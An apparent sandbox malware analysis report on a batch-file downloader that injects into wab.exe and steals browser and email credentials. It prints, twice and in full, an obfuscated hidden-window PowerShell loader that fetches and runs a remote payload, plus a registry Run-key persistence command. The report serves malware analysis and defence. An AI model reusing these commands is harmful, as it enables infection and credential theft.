Windows 7 deprecation
Windows 7 will be removed from on 2025-03-31
max time kernel
148s -
max time network
150s -
windows10-2004_x64 -
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
11/09/2024, 08:27
Static task
Behavioral task
Behavioral task
Malware Config
A shellcode based downloader first seen in 2020.
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/4456-68-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/1552-71-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/1696-67-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/4456-68-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/1696-67-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 1 IoCs
flow pid Process 8 1444 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1444 powershell.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts wab.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aerolithology = "%Smasket% -w 1 $Nominator163=(Get-ItemProperty -Path 'HKCU:\\Mycotoxin\\').Svns;%Smasket% ($Nominator163)" reg.exe -
pid Process 2944 powershell.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 3488 wab.exe 3488 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2944 powershell.exe 3488 wab.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2944 set thread context of 3488 2944 powershell.exe 99 PID 3488 set thread context of 1696 3488 wab.exe 105 PID 3488 set thread context of 4456 3488 wab.exe 106 PID 3488 set thread context of 1552 3488 wab.exe 107 -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2936 reg.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1444 powershell.exe 1444 powershell.exe 2944 powershell.exe 2944 powershell.exe 2944 powershell.exe 1696 wab.exe 1696 wab.exe 1552 wab.exe 1552 wab.exe 1696 wab.exe 1696 wab.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 2944 powershell.exe 3488 wab.exe 3488 wab.exe 3488 wab.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1444 powershell.exe Token: SeDebugPrivilege 2944 powershell.exe Token: SeDebugPrivilege 1552 wab.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 4160 wrote to memory of 1444 4160 cmd.exe 84 PID 4160 wrote to memory of 1444 4160 cmd.exe 84 PID 1444 wrote to memory of 3932 1444 powershell.exe 86 PID 1444 wrote to memory of 3932 1444 powershell.exe 86 PID 1444 wrote to memory of 2944 1444 powershell.exe 94 PID 1444 wrote to memory of 2944 1444 powershell.exe 94 PID 1444 wrote to memory of 2944 1444 powershell.exe 94 PID 2944 wrote to memory of 3724 2944 powershell.exe 96 PID 2944 wrote to memory of 3724 2944 powershell.exe 96 PID 2944 wrote to memory of 3724 2944 powershell.exe 96 PID 2944 wrote to memory of 3488 2944 powershell.exe 99 PID 2944 wrote to memory of 3488 2944 powershell.exe 99 PID 2944 wrote to memory of 3488 2944 powershell.exe 99 PID 2944 wrote to memory of 3488 2944 powershell.exe 99 PID 2944 wrote to memory of 3488 2944 powershell.exe 99 PID 3488 wrote to memory of 2524 3488 wab.exe 100 PID 3488 wrote to memory of 2524 3488 wab.exe 100 PID 3488 wrote to memory of 2524 3488 wab.exe 100 PID 2524 wrote to memory of 2936 2524 cmd.exe 102 PID 2524 wrote to memory of 2936 2524 cmd.exe 102 PID 2524 wrote to memory of 2936 2524 cmd.exe 102 PID 3488 wrote to memory of 1696 3488 wab.exe 105 PID 3488 wrote to memory of 1696 3488 wab.exe 105 PID 3488 wrote to memory of 1696 3488 wab.exe 105 PID 3488 wrote to memory of 1696 3488 wab.exe 105 PID 3488 wrote to memory of 4456 3488 wab.exe 106 PID 3488 wrote to memory of 4456 3488 wab.exe 106 PID 3488 wrote to memory of 4456 3488 wab.exe 106 PID 3488 wrote to memory of 4456 3488 wab.exe 106 PID 3488 wrote to memory of 1552 3488 wab.exe 107 PID 3488 wrote to memory of 1552 3488 wab.exe 107 PID 3488 wrote to memory of 1552 3488 wab.exe 107 PID 3488 wrote to memory of 1552 3488 wab.exe 107
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ORDER DATASHEET.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4160 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Finanslovens189='Tekstformateringsprogrammet';$Bairnish=${host}.Runspace;If ($Bairnish) {$Biodynamikkens++;$Finanslovens189+='Biofysikkens25';$Autorisationsordnings='su';$Finanslovens189+='Moonshee';$Autorisationsordnings+='bs';$Finanslovens189+='Uforsigtighedens48';$Autorisationsordnings+='tri';$Finanslovens189+='hoselike';$Autorisationsordnings+='ng';};Function Barbitursyren($Flumes){$Exclusivenesses=$Flumes.Length-$Biodynamikkens;For( $Francoiss120=2;$Francoiss120 -lt $Exclusivenesses;$Francoiss120+=3){$Menualternativets+=$Flumes.$Autorisationsordnings.'Invoke'( $Francoiss120, $Biodynamikkens);}$Menualternativets;}function Anagenetic($Absurder106){ & ($largitional) ($Absurder106);}$Poonac=Barbitursyren 'AcM SoOmzMiiPrlKllStaFi/ v5h .B,0P To(TiWwoi,anCrd HoUnwDrsJg .uN.aTKv M1Dr0 M.,n0Er;Hn koWAri,onAf6Fa4Pr;fl .xMe6A,4Wo;Ga MirSuvOn: P1Pa2 M1S.. 0 S),a .aGAneSoc BkNooSh/ a2d 0 C1Ba0 M0In1G,0Fi1B. TrF ai rDae ifA oGax a/ k1 E2 B1Is. .0Ru ';$Tegnkonventioner=Barbitursyren 'ReUIns MeSer e- n,htBa ';$Trinvise=Barbitursyren ' VhVitRetSppE,sOp:me/Fa/,dt SoMoiP,nS,fBai,ln ,iChtP.yH.a.anJ.dL.bTeeSpy io Vn Pd,etNarEuaRev eStlU..KynTieHetGa/spwDrpB.-B iD n UcMil,auSkdTve,rs,e/,df ,n St CsLi/omUb.nKrhPla CtAui InTig I. Uz E ';$Peritoneopericardial101=Barbitursyren 'Sk> M ';$largitional=Barbitursyren ',iiL.eP,xFo ';$Carpetmaker='Smagstter';$Hydrolytic0 = Barbitursyren ' PeWecAlh,coOl Ha% aDrpSapMid QaS,tDua .%Pa\ HTD,eTindudSoeprn ,s .r.lo Gm DaIrn e r SnskeL s H.IcPTioKolHy .v&.i&Un PeKoc,ahAno C jt U ';Anagenetic (Barbitursyren 'Mi$CugA lSpocabPraHelSc:EtEKof,pt eH rC,sExpE,oUnrZae .nSkdoteHysGa= (HvcBam,udUn K/PlcJ. Ce$ UHFlyOpdU r.uo elQuysatSki cHo0Or)Un ');Anagenetic (Barbitursyren 'Go$,igUdl ,oPubCaaNol C: ESAnvSyuHalTem RechdTeeVastr=Ko$SaT erg.iSanhavSoiU sS e n.Mas p TlNai Pt.i( D$ P .eFor LnJae oSepFre arcoiC,c ,a or BdTuig,aBelBo1C.0ro1Mo)V ');Anagenetic (Barbitursyren ' W[ AN,oeEmtbr.S.S,oeAmr nv PiHoc ,e EP PoC,i.nn .tOpMGaa nAea SgSle irH ]Br:B : dS NeP,c Su,arFiiKltViyDoPLerr oL.tD.o Ec SoFulD. Po=Bo Ri[MlNS,eSmtWi. uSRoeOucFluTyrNai BtHuyPeP Cr So AtMooTrcAsoInl RTLiy RpvieC ]Kv:Sk: T,olCusVa1U,2 r ');$Trinvise=$Svulmedes[0];$Forsstring= (Barbitursyren 'Ar$UtgS lT.oIlb .a SlNe: Rr oe.scDee Fd aeBosja= .N Ee,ow - ROGebEnjEte .cMatLa NeS hySwshitBeeMamSi. sNPre.stLa.c.W UeD b vCStlOrihkeS.n st');$Forsstring+=$Eftersporendes[1];Anagenetic ($Forsstring);Anagenetic (Barbitursyren 'pr$Ugr VeFoc,re fd oe.ts E.ReH,me ,a CdSpeFurSts y[Me$,nTnieScgHenGrkuno,an nv BeA,nP tGriTio NnF,eB rU,]La=Sl$ VPOuoReo.mnHaaCecEr ');$Dumhed=Barbitursyren 'Ba$Spr .e FcAdeK,dVeeBusdt. KD.doafwBen .lScoAnaI.dU F.eibrlInefy(Au$.iTTorBrivenF vC,i ,s .eD., C$a b.baBolModg,e Sn O)N. ';$balden=$Eftersporendes[0];Anagenetic (Barbitursyren 'Ap$Hog El FoSib.taE,l C: E SkP.sH.p gaQ,nKrsS,i Don,n.aiP sYdmN,e,nn .sBe=Sh(L.T Retus tp.-JaP DaVetSkhSa D,$FibBlaTilUhdMeeHjnco)R, ');while (!$Ekspansionismens) {Anagenetic (Barbitursyren '.o$Prg ,lOpoAcbSpa,elSt:GuSBlkEmeTutGrc h re .d,v=m.$F.tSkrU,u Oe D ') ;Anagenetic $Dumhed;Anagenetic (Barbitursyren '.eSIntUnaInrTitI,- RS .l.reude JpRe Sp4an ');Anagenetic (Barbitursyren '.r$ Ag Tl,lo bDiaE.lF,:prEDykC,sKipAnaNon IsIniK o rn UiPrsRemSmeF,nA s K=B.(AnTP eT sVet U- FPPraT,t bhSk St$SobAla DlC,dUne enKu)Pl ') ;Anagenetic (Barbitursyren 'E $ FgEkl ToU b.aa ilap: Sf .oDyr Ze .p Ko UsTrtSt=C,$.ugRelMgo .b,ea ,l,i:RoSHekF i Gn.onIdeHobfrrusulod.edJve.otLa+So+,r%Cr$t SSov,iuHalLimhue ud.eesos a. VcEfoA uHjnbotl ') ;$Trinvise=$Svulmedes[$forepost];}$Ver=291966;$manchuria=26975;Anagenetic (Barbitursyren ' A$.egBylPaoHebTea SlSt:StFhal WjNol,osLahanySmn idMee SrBunSpe,i We=R S G Feopt S-A,CMoo , Se,rnC tAb Af$BrbTuaAjlErdvlePanAn ');Anagenetic (Barbitursyren 'Ca$H.gInlU.oO.bE a alp.:EhS pa,nsT.s.eiSkeMas Ft u .e=A, S[.uSR yU s,rt Re BmUn.ArC,uo,on MvPaeP rFotKa]S,:Is:paFdirS.oBymLoBTha Ps.oe U6B,4 MS Bt ,r nibun AgCy(Ag$MoF,llBajWilSlsT,hbeyH.nJ ddoeHarO.nUneta) S ');Anagenetic (Barbitursyren 'I.$Deg.ilT oR,bOmaK l S:urBRei,us,nmP,uRet,ct Ae TnUds P M=K, ba[UnSDry ,sFet .eTrmBe.TuT BeKux ,t ,. OES,nPucSko AdGoi An FgAn]C :.e:SuAU S eC UIBeISp. fGSteF.tF.SN.t .rSci Hn Dg t(hy$R.SNoa RsPrsS iTheNss .tUn)N. ');Anagenetic (Barbitursyren 'Em$ ogMalFaoN,bP.a IlKo:FiLAny,ln lg lbSeySae VaKaeGu=Ly$U,B EiFrsT,mFiuL.tM tu eUnn ,sWr. sHeuUnbFosFrt brSti .nRegan( k$StVHaeInred,Sy$.mmSua KnU,c FhSpuFirGli Sa.l) ');Anagenetic $Lyngbyeae;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tendensromanernes.Pol && echo t"3⤵PID:3932
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Finanslovens189='Tekstformateringsprogrammet';$Bairnish=${host}.Runspace;If ($Bairnish) {$Biodynamikkens++;$Finanslovens189+='Biofysikkens25';$Autorisationsordnings='su';$Finanslovens189+='Moonshee';$Autorisationsordnings+='bs';$Finanslovens189+='Uforsigtighedens48';$Autorisationsordnings+='tri';$Finanslovens189+='hoselike';$Autorisationsordnings+='ng';};Function Barbitursyren($Flumes){$Exclusivenesses=$Flumes.Length-$Biodynamikkens;For( $Francoiss120=2;$Francoiss120 -lt $Exclusivenesses;$Francoiss120+=3){$Menualternativets+=$Flumes.$Autorisationsordnings.'Invoke'( $Francoiss120, $Biodynamikkens);}$Menualternativets;}function Anagenetic($Absurder106){ & ($largitional) ($Absurder106);}$Poonac=Barbitursyren 'AcM SoOmzMiiPrlKllStaFi/ v5h .B,0P To(TiWwoi,anCrd HoUnwDrsJg .uN.aTKv M1Dr0 M.,n0Er;Hn koWAri,onAf6Fa4Pr;fl .xMe6A,4Wo;Ga MirSuvOn: P1Pa2 M1S.. 0 S),a .aGAneSoc BkNooSh/ a2d 0 C1Ba0 M0In1G,0Fi1B. TrF ai rDae ifA oGax a/ k1 E2 B1Is. .0Ru ';$Tegnkonventioner=Barbitursyren 'ReUIns MeSer e- n,htBa ';$Trinvise=Barbitursyren ' VhVitRetSppE,sOp:me/Fa/,dt SoMoiP,nS,fBai,ln ,iChtP.yH.a.anJ.dL.bTeeSpy io Vn Pd,etNarEuaRev eStlU..KynTieHetGa/spwDrpB.-B iD n UcMil,auSkdTve,rs,e/,df ,n St CsLi/omUb.nKrhPla CtAui InTig I. Uz E ';$Peritoneopericardial101=Barbitursyren 'Sk> M ';$largitional=Barbitursyren ',iiL.eP,xFo ';$Carpetmaker='Smagstter';$Hydrolytic0 = Barbitursyren ' PeWecAlh,coOl Ha% aDrpSapMid QaS,tDua .%Pa\ HTD,eTindudSoeprn ,s .r.lo Gm DaIrn e r SnskeL s H.IcPTioKolHy .v&.i&Un PeKoc,ahAno C jt U ';Anagenetic (Barbitursyren 'Mi$CugA lSpocabPraHelSc:EtEKof,pt eH rC,sExpE,oUnrZae .nSkdoteHysGa= (HvcBam,udUn K/PlcJ. Ce$ UHFlyOpdU r.uo elQuysatSki cHo0Or)Un ');Anagenetic (Barbitursyren 'Go$,igUdl ,oPubCaaNol C: ESAnvSyuHalTem RechdTeeVastr=Ko$SaT erg.iSanhavSoiU sS e n.Mas p TlNai Pt.i( D$ P .eFor LnJae oSepFre arcoiC,c ,a or BdTuig,aBelBo1C.0ro1Mo)V ');Anagenetic (Barbitursyren ' W[ AN,oeEmtbr.S.S,oeAmr nv PiHoc ,e EP PoC,i.nn .tOpMGaa nAea SgSle irH ]Br:B : dS NeP,c Su,arFiiKltViyDoPLerr oL.tD.o Ec SoFulD. Po=Bo Ri[MlNS,eSmtWi. uSRoeOucFluTyrNai BtHuyPeP Cr So AtMooTrcAsoInl RTLiy RpvieC ]Kv:Sk: T,olCusVa1U,2 r ');$Trinvise=$Svulmedes[0];$Forsstring= (Barbitursyren 'Ar$UtgS lT.oIlb .a SlNe: Rr oe.scDee Fd aeBosja= .N Ee,ow - ROGebEnjEte .cMatLa NeS hySwshitBeeMamSi. sNPre.stLa.c.W UeD b vCStlOrihkeS.n st');$Forsstring+=$Eftersporendes[1];Anagenetic ($Forsstring);Anagenetic (Barbitursyren 'pr$Ugr VeFoc,re fd oe.ts E.ReH,me ,a CdSpeFurSts y[Me$,nTnieScgHenGrkuno,an nv BeA,nP tGriTio NnF,eB rU,]La=Sl$ VPOuoReo.mnHaaCecEr ');$Dumhed=Barbitursyren 'Ba$Spr .e FcAdeK,dVeeBusdt. KD.doafwBen .lScoAnaI.dU F.eibrlInefy(Au$.iTTorBrivenF vC,i ,s .eD., C$a b.baBolModg,e Sn O)N. ';$balden=$Eftersporendes[0];Anagenetic (Barbitursyren 'Ap$Hog El FoSib.taE,l C: E SkP.sH.p gaQ,nKrsS,i Don,n.aiP sYdmN,e,nn .sBe=Sh(L.T Retus tp.-JaP DaVetSkhSa D,$FibBlaTilUhdMeeHjnco)R, ');while (!$Ekspansionismens) {Anagenetic (Barbitursyren '.o$Prg ,lOpoAcbSpa,elSt:GuSBlkEmeTutGrc h re .d,v=m.$F.tSkrU,u Oe D ') ;Anagenetic $Dumhed;Anagenetic (Barbitursyren '.eSIntUnaInrTitI,- RS .l.reude JpRe Sp4an ');Anagenetic (Barbitursyren '.r$ Ag Tl,lo bDiaE.lF,:prEDykC,sKipAnaNon IsIniK o rn UiPrsRemSmeF,nA s K=B.(AnTP eT sVet U- FPPraT,t bhSk St$SobAla DlC,dUne enKu)Pl ') ;Anagenetic (Barbitursyren 'E $ FgEkl ToU b.aa ilap: Sf .oDyr Ze .p Ko UsTrtSt=C,$.ugRelMgo .b,ea ,l,i:RoSHekF i Gn.onIdeHobfrrusulod.edJve.otLa+So+,r%Cr$t SSov,iuHalLimhue ud.eesos a. VcEfoA uHjnbotl ') ;$Trinvise=$Svulmedes[$forepost];}$Ver=291966;$manchuria=26975;Anagenetic (Barbitursyren ' A$.egBylPaoHebTea SlSt:StFhal WjNol,osLahanySmn idMee SrBunSpe,i We=R S G Feopt S-A,CMoo , Se,rnC tAb Af$BrbTuaAjlErdvlePanAn ');Anagenetic (Barbitursyren 'Ca$H.gInlU.oO.bE a alp.:EhS pa,nsT.s.eiSkeMas Ft u .e=A, S[.uSR yU s,rt Re BmUn.ArC,uo,on MvPaeP rFotKa]S,:Is:paFdirS.oBymLoBTha Ps.oe U6B,4 MS Bt ,r nibun AgCy(Ag$MoF,llBajWilSlsT,hbeyH.nJ ddoeHarO.nUneta) S ');Anagenetic (Barbitursyren 'I.$Deg.ilT oR,bOmaK l S:urBRei,us,nmP,uRet,ct Ae TnUds P M=K, ba[UnSDry ,sFet .eTrmBe.TuT BeKux ,t ,. OES,nPucSko AdGoi An FgAn]C :.e:SuAU S eC UIBeISp. fGSteF.tF.SN.t .rSci Hn Dg t(hy$R.SNoa RsPrsS iTheNss .tUn)N. ');Anagenetic (Barbitursyren 'Em$ ogMalFaoN,bP.a IlKo:FiLAny,ln lg lbSeySae VaKaeGu=Ly$U,B EiFrsT,mFiuL.tM tu eUnn ,sWr. sHeuUnbFosFrt brSti .nRegan( k$StVHaeInred,Sy$.mmSua KnU,c FhSpuFirGli Sa.l) ');Anagenetic $Lyngbyeae;"3⤵
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tendensromanernes.Pol && echo t"4⤵
- System Location Discovery: System Language Discovery
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3488 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "aerolithology" /t REG_EXPAND_SZ /d "%Smasket% -w 1 $Nominator163=(Get-ItemProperty -Path 'HKCU:\Mycotoxin\').Svns;%Smasket% ($Nominator163)"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "aerolithology" /t REG_EXPAND_SZ /d "%Smasket% -w 1 $Nominator163=(Get-ItemProperty -Path 'HKCU:\Mycotoxin\').Svns;%Smasket% ($Nominator163)"6⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\uyxhubw"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xalruthzoz"5⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\huqknmstjhhhft"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...